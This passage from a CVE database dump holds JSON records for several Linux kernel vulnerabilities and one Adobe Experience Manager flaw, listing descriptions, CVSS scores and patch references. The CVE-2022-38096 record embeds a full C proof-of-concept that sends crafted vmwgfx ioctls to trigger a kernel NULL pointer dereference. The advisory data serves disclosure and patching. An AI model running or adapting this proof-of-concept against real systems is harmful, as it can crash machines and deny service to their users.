            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "HIGH",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-05-21T04:00:52.197Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://syzkaller.appspot.com/bug?id=2212474c958978ab86525fe6832ac8102c309ffc"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://kernel.dance/#04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220506-0007/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use after Free in tc_new_tfilter allowing for privilege escalation in Linux Kernel",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@google.com",
          "ID": "CVE-2022-1055",
          "STATE": "PUBLIC",
          "TITLE": "Use after Free in tc_new_tfilter allowing for privilege escalation in Linux Kernel"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003e",
                            "version_value": "v5.1-rc1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A use-after-free exists in the Linux Kernel in tc_new_tfilter that could allow a local attacker to gain privilege escalation. The exploit requires unprivileged user namespaces. We recommend upgrading past commit 04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5"
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-416 Use After Free"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5",
              "refsource": "MISC",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5"
            },
            {
              "name": "https://syzkaller.appspot.com/bug?id=2212474c958978ab86525fe6832ac8102c309ffc",
              "refsource": "MISC",
              "url": "https://syzkaller.appspot.com/bug?id=2212474c958978ab86525fe6832ac8102c309ffc"
            },
            {
              "name": "https://kernel.dance/#04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5",
              "refsource": "MISC",
              "url": "https://kernel.dance/#04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220506-0007/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220506-0007/"
            },
            {
              "name": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
            }
          ]
        },
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2022-1055",
    "datePublished": "2022-03-29T15:05:13",
    "dateReserved": "2022-03-22T00:00:00",
    "dateUpdated": "2024-08-02T23:47:43.302Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-4921
Vulnerability from cvelistv5
Published
2023-09-12 19:45
Modified
2024-08-02 07:44
Severity
Summary
Use-after-free in Linux kernel's net/sched: sch_qfq component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:44:52.210Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8fc134fee27f2263988ae38920bc03da416b03d8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/8fc134fee27f2263988ae38920bc03da416b03d8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.6",
              "status": "affected",
              "version": "3.8",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "valis"
        }
      ],
      "datePublic": "2023-09-05T06:54:12+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: sch_qfq component can be exploited to achieve local privilege escalation.\n\nWhen the plug qdisc is used as a class of the qfq qdisc, sending network packets triggers use-after-free in qfq_dequeue() due to the incorrect .peek handler of sch_plug and lack of error checking in agg_dequeue().\n\nWe recommend upgrading past commit 8fc134fee27f2263988ae38920bc03da416b03d8.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-12T19:45:19.367Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8fc134fee27f2263988ae38920bc03da416b03d8"
        },
        {
          "url": "https://kernel.dance/8fc134fee27f2263988ae38920bc03da416b03d8"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s net/sched: sch_qfq component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-4921",
    "datePublished": "2023-09-12T19:45:19.367Z",
    "dateReserved": "2023-09-12T19:22:10.389Z",
    "dateUpdated": "2024-08-02T07:44:52.210Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2016-0957
Vulnerability from cvelistv5
Published
2016-02-10 20:00
Modified
2024-08-05 22:38
Severity
Summary
Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
Impacted products
VendorProduct
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T22:38:41.312Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-02-09T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-02-10T19:57:01",
        "orgId": "078d4453-3bcd-4900-85e6-15281da43538",
        "shortName": "adobe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@adobe.com",
          "ID": "CVE-2016-0957",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html",
              "refsource": "CONFIRM",
              "url": "https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "078d4453-3bcd-4900-85e6-15281da43538",
    "assignerShortName": "adobe",
    "cveId": "CVE-2016-0957",
    "datePublished": "2016-02-10T20:00:00",
    "dateReserved": "2015-12-22T00:00:00",
    "dateUpdated": "2024-08-05T22:38:41.312Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-38096
Vulnerability from cvelistv5
Published
2022-09-06 00:00
Modified
2024-08-03 10:45
Severity
Summary
There is a NULL pointer vulnerability in vmwgfx driver
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.14",
                "status": "affected",
                "version": "v4.20-rc1",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-38096",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-26T13:45:25.191519Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-26T13:49:29.690Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:45:52.802Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
          },
          {
            "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.20-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid){  \nint cmd[0x1000]={0};\ncmd[0]=1165;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=sid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context();  \n  printf(\"%d\",cid);     \n    poc(cid);            \n  \n}\n  \n"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-476",
              "description": "CWE-476 NULL Pointer Dereference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-06-25T21:08:05.642043",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
        },
        {
          "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is a NULL pointer vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-38096",
    "datePublished": "2022-09-06T00:00:00",
    "dateReserved": "2022-09-07T00:00:00",
    "dateUpdated": "2024-08-03T10:45:52.802Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3564
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel Bluetooth l2cap_core.c l2cap_reassemble_sdu use after free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:01.563Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=89f9f3cb86b1c63badaf392a83dd661d56cc50b1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211087"
          },
          {
            "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20221223-0001/"
          },
          {
            "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-24T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=89f9f3cb86b1c63badaf392a83dd661d56cc50b1"
        },
        {
          "url": "https://vuldb.com/?id.211087"
        },
        {
          "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20221223-0001/"
        },
        {
          "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
        }
      ],
      "title": "Linux Kernel Bluetooth l2cap_core.c l2cap_reassemble_sdu use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3564",
    "datePublished": "2022-10-17T00:00:00",
    "dateReserved": "2022-10-17T00:00:00",
    "dateUpdated": "2024-08-03T01:14:01.563Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3623
Vulnerability from cvelistv5
Published
2022-10-20 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel BPF gup.c follow_page_pte race condition
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.805Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=fac35ba763ed07ba93154c95ffc0c4a55023707f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211921"
          },
          {
            "name": "DSA-5324",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5324"
          },
          {
            "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function follow_page_pte of the file mm/gup.c of the component BPF. The manipulation leads to race condition. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211921 was assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-362",
              "description": "CWE-362 Race Condition",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-03-03T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=fac35ba763ed07ba93154c95ffc0c4a55023707f"
        },
        {
          "url": "https://vuldb.com/?id.211921"
        },
        {
          "name": "DSA-5324",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2023/dsa-5324"
        },
        {
          "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"
        }
      ],
      "title": "Linux Kernel BPF gup.c follow_page_pte race condition",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3623",
    "datePublished": "2022-10-20T00:00:00",
    "dateReserved": "2022-10-20T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.805Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-1116
Vulnerability from cvelistv5
Published
2022-05-17 16:50
Modified
2024-08-02 23:55
Severity
Summary
Integer Overflow or Wraparound vulnerability in io_uring of Linux Kernel allows local attacker to cause memory corruption and escalate privileges to root. This issue affects: Linux Kernel versions prior to 5.4.189; version 5.4.24 and later versions.
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:55:23.656Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/fs/io_uring.c?h=v5.4.189\u0026id=1a623d361ffe5cecd4244a02f449528416360038"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
